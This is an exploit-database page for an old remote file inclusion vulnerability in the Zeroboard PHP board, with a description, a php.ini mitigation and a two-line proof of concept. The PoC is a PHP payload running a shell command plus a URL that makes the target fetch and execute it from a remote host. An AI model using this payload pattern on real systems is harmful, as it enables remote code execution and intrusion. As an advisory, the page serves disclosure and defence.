header-logo
Suggest Exploit
vendor:
Zeroboard
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Zeroboard
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Unix
2002

Zeroboard Remote File Inclusion Vulnerability

Zeroboard is a PHP web board package available for the Linux and Unix platforms. Under some circumstances, it may be possible to include arbitrary PHP files. The _head.php file does not sufficiently check or sanitize input. When the "allow_url_fopen" variable and the "register_globals" variable in php.ini are set to "On," it is possible to load a PHP include file from a remote URL via the _head.php script.

Mitigation:

Ensure that the "allow_url_fopen" and "register_globals" variables in php.ini are set to "Off".
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5028/info

Zeroboard is a PHP web board package available for the Linux and Unix platforms.

Under some circumstances, it may be possible to include arbitrary PHP files. The _head.php file does not sufficiently check or sanitize input. When the "allow_url_fopen" variable and the "register_globals" variable in php.ini are set to "On," it is possible to load a PHP include file from a remote URL via the _head.php script. 

PHP Source file a.php
<? passthru("/bin/ls"); ?>

Accessing URL on vulnerable system:
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a

Navigation

Suggest Exploit

Services By CQR